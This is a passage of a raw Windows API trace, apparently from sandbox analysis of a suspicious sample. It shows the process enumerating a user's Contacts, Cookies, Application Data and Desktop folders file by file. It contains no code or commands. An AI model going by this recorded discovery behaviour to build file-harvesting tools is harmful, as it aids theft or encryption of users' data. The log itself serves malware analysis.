ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfdb3fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0165.812] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.812] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.813] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.813] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0165.813] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.813] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.813] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.813] PathFindFileNameW (pszPath="") returned="" [0165.813] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfdb3fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfdb3fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0165.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0165.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.813] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.813] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0165.813] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.813] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.813] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.813] PathFindFileNameW (pszPath="") returned="" [0165.814] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0165.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0165.814] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.814] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0165.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.814] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.815] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.815] PathFindFileNameW (pszPath="") returned="" [0165.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0165.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.815] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.815] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0165.815] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.815] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.815] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.815] PathFindFileNameW (pszPath="") returned="" [0165.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe8a11780, ftLastAccessTime.dwHighDateTime=0x1d69ad4, ftLastWriteTime.dwLowDateTime=0xe8a11780, ftLastWriteTime.dwHighDateTime=0x1d69ad4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.815] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe8a11780, ftLastAccessTime.dwHighDateTime=0x1d69ad4, ftLastWriteTime.dwLowDateTime=0xe8a11780, ftLastWriteTime.dwHighDateTime=0x1d69ad4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.815] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8466a20, ftCreationTime.dwHighDateTime=0x1d5e0bf, ftLastAccessTime.dwLowDateTime=0xeef9aa10, ftLastAccessTime.dwHighDateTime=0x1d5dcad, ftLastWriteTime.dwLowDateTime=0xeef9aa10, ftLastWriteTime.dwHighDateTime=0x1d5dcad, nFileSizeHigh=0x0, nFileSizeLow=0x165cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5DnktQKC1zi5mnZO.mkv", cAlternateFileName="5DNKTQ~1.MKV")) returned 1 [0165.815] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe986430, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe477ab20, ftLastAccessTime.dwHighDateTime=0x1d5e359, ftLastWriteTime.dwLowDateTime=0xe477ab20, ftLastWriteTime.dwHighDateTime=0x1d5e359, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5RddQRlUxLC956", cAlternateFileName="5RDDQR~1")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2bfa880, ftCreationTime.dwHighDateTime=0x1d5d88a, ftLastAccessTime.dwLowDateTime=0x764b5670, ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0x764b5670, ftLastWriteTime.dwHighDateTime=0x1d5de26, nFileSizeHigh=0x0, nFileSizeLow=0x11e39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9WEgK.mp3", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8adcb9e0, ftCreationTime.dwHighDateTime=0x1d5e81b, ftLastAccessTime.dwLowDateTime=0xe06081b0, ftLastAccessTime.dwHighDateTime=0x1d5dcb5, ftLastWriteTime.dwLowDateTime=0xe06081b0, ftLastWriteTime.dwHighDateTime=0x1d5dcb5, nFileSizeHigh=0x0, nFileSizeLow=0x14dbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BsP7T_k67YTo.flv", cAlternateFileName="BSP7T_~1.FLV")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca51c70, ftCreationTime.dwHighDateTime=0x1d5d89a, ftLastAccessTime.dwLowDateTime=0x7715b8a0, ftLastAccessTime.dwHighDateTime=0x1d5e116, ftLastWriteTime.dwLowDateTime=0x7715b8a0, ftLastWriteTime.dwHighDateTime=0x1d5e116, nFileSizeHigh=0x0, nFileSizeLow=0xf1a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dYuqrWvtnb3egSZlbU66.jpg", cAlternateFileName="DYUQRW~1.JPG")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3787090, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x28785b30, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x28785b30, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x2c53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Elsla0Zqhx4FiR_w.pps", cAlternateFileName="ELSLA0~1.PPS")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf494bb20, ftCreationTime.dwHighDateTime=0x1d5dc50, ftLastAccessTime.dwLowDateTime=0x2e8537d0, ftLastAccessTime.dwHighDateTime=0x1d5e465, ftLastWriteTime.dwLowDateTime=0x2e8537d0, ftLastWriteTime.dwHighDateTime=0x1d5e465, nFileSizeHigh=0x0, nFileSizeLow=0x26b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EQ9uGJ_2p6GN4_4.bmp", cAlternateFileName="EQ9UGJ~1.BMP")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bc21130, ftCreationTime.dwHighDateTime=0x1d5de53, ftLastAccessTime.dwLowDateTime=0xe55881f0, ftLastAccessTime.dwHighDateTime=0x1d5de3a, ftLastWriteTime.dwLowDateTime=0xe55881f0, ftLastWriteTime.dwHighDateTime=0x1d5de3a, nFileSizeHigh=0x0, nFileSizeLow=0xa4e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXFGptd.ppt", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27189920, ftCreationTime.dwHighDateTime=0x1d5e414, ftLastAccessTime.dwLowDateTime=0x5dd94890, ftLastAccessTime.dwHighDateTime=0x1d5e718, ftLastWriteTime.dwLowDateTime=0x5dd94890, ftLastWriteTime.dwHighDateTime=0x1d5e718, nFileSizeHigh=0x0, nFileSizeLow=0x25de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f4Fk.jpg", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x161313d0, ftCreationTime.dwHighDateTime=0x1d5d9d8, ftLastAccessTime.dwLowDateTime=0x482990f0, ftLastAccessTime.dwHighDateTime=0x1d5dfa1, ftLastWriteTime.dwLowDateTime=0x482990f0, ftLastWriteTime.dwHighDateTime=0x1d5dfa1, nFileSizeHigh=0x0, nFileSizeLow=0x9681, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grGgx5k9.mp3", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61f571f0, ftCreationTime.dwHighDateTime=0x1d5de90, ftLastAccessTime.dwLowDateTime=0x6afbd6a0, ftLastAccessTime.dwHighDateTime=0x1d5e7f9, ftLastWriteTime.dwLowDateTime=0x6afbd6a0, ftLastWriteTime.dwHighDateTime=0x1d5e7f9, nFileSizeHigh=0x0, nFileSizeLow=0xae91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HdK_33dFTHF oYByX3m.gif", cAlternateFileName="HDK_33~1.GIF")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec81a810, ftCreationTime.dwHighDateTime=0x1d5d932, ftLastAccessTime.dwLowDateTime=0xc6b86570, ftLastAccessTime.dwHighDateTime=0x1d5d91d, ftLastWriteTime.dwLowDateTime=0xc6b86570, ftLastWriteTime.dwHighDateTime=0x1d5d91d, nFileSizeHigh=0x0, nFileSizeLow=0xab93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hmA9JJhbA0oQ6ovas.mp3", cAlternateFileName="HMA9JJ~1.MP3")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a924c0, ftCreationTime.dwHighDateTime=0x1d5e18e, ftLastAccessTime.dwLowDateTime=0x26796730, ftLastAccessTime.dwHighDateTime=0x1d5d7c4, ftLastWriteTime.dwLowDateTime=0x26796730, ftLastWriteTime.dwHighDateTime=0x1d5d7c4, nFileSizeHigh=0x0, nFileSizeLow=0xaa02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JEFgYE2 YDdJSyFXdv.swf", cAlternateFileName="JEFGYE~1.SWF")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e87e510, ftCreationTime.dwHighDateTime=0x1d5e1a7, ftLastAccessTime.dwLowDateTime=0x67a26f60, ftLastAccessTime.dwHighDateTime=0x1d5e66d, ftLastWriteTime.dwLowDateTime=0x67a26f60, ftLastWriteTime.dwHighDateTime=0x1d5e66d, nFileSizeHigh=0x0, nFileSizeLow=0x18b18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KDhrAhNu6jQBzP8T.xls", cAlternateFileName="KDHRAH~1.XLS")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b46860, ftCreationTime.dwHighDateTime=0x1d5e7dd, ftLastAccessTime.dwLowDateTime=0x1c145b60, ftLastAccessTime.dwHighDateTime=0x1d5d968, ftLastWriteTime.dwLowDateTime=0x1c145b60, ftLastWriteTime.dwHighDateTime=0x1d5d968, nFileSizeHigh=0x0, nFileSizeLow=0x326b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kLIoOLxdv.pptx", cAlternateFileName="KLIOOL~1.PPT")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb87943b0, ftCreationTime.dwHighDateTime=0x1d5dea6, ftLastAccessTime.dwLowDateTime=0xb78df2b0, ftLastAccessTime.dwHighDateTime=0x1d5e1ae, ftLastWriteTime.dwLowDateTime=0xb78df2b0, ftLastWriteTime.dwHighDateTime=0x1d5e1ae, nFileSizeHigh=0x0, nFileSizeLow=0xab0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ndaW7cmNb.gif", cAlternateFileName="NDAW7C~1.GIF")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18911b30, ftCreationTime.dwHighDateTime=0x1d5e715, ftLastAccessTime.dwLowDateTime=0xaeb6d920, ftLastAccessTime.dwHighDateTime=0x1d5d8fa, ftLastWriteTime.dwLowDateTime=0xaeb6d920, ftLastWriteTime.dwHighDateTime=0x1d5d8fa, nFileSizeHigh=0x0, nFileSizeLow=0x186e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nH5qXP_95YPmxX.mkv", cAlternateFileName="NH5QXP~1.MKV")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c00e00, ftCreationTime.dwHighDateTime=0x1d69ad4, ftLastAccessTime.dwLowDateTime=0xd158a480, ftLastAccessTime.dwHighDateTime=0x1d69ad4, ftLastWriteTime.dwLowDateTime=0xb423d600, ftLastWriteTime.dwHighDateTime=0x1d69ad4, nFileSizeHigh=0x0, nFileSizeLow=0xabc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OnB5h0yX46mreVq4.exe", cAlternateFileName="ONB5H0~1.EXE")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93f05ec0, ftCreationTime.dwHighDateTime=0x1d5e3bf, ftLastAccessTime.dwLowDateTime=0x1a1f0dc0, ftLastAccessTime.dwHighDateTime=0x1d5d8e9, ftLastWriteTime.dwLowDateTime=0x1a1f0dc0, ftLastWriteTime.dwHighDateTime=0x1d5d8e9, nFileSizeHigh=0x0, nFileSizeLow=0xeb83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pPZL.swf", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57810460, ftCreationTime.dwHighDateTime=0x1d5e7a9, ftLastAccessTime.dwLowDateTime=0xdc765c10, ftLastAccessTime.dwHighDateTime=0x1d5e772, ftLastWriteTime.dwLowDateTime=0xdc765c10, ftLastWriteTime.dwHighDateTime=0x1d5e772, nFileSizeHigh=0x0, nFileSizeLow=0x7e84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qrpy3cG52AHZ_9BZ.m4a", cAlternateFileName="QRPY3C~1.M4A")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63838ab0, ftCreationTime.dwHighDateTime=0x1d5d8ab, ftLastAccessTime.dwLowDateTime=0xcdfd0b60, ftLastAccessTime.dwHighDateTime=0x1d5e7b4, ftLastWriteTime.dwLowDateTime=0xcdfd0b60, ftLastWriteTime.dwHighDateTime=0x1d5e7b4, nFileSizeHigh=0x0, nFileSizeLow=0x9216, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RaJMjJJ.flv", cAlternateFileName="")) returned 1 [0165.816] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf451a900, ftCreationTime.dwHighDateTime=0x1d5d96e, ftLastAccessTime.dwLowDateTime=0xd8d1e6c0, ftLastAccessTime.dwHighDateTime=0x1d5d86c, 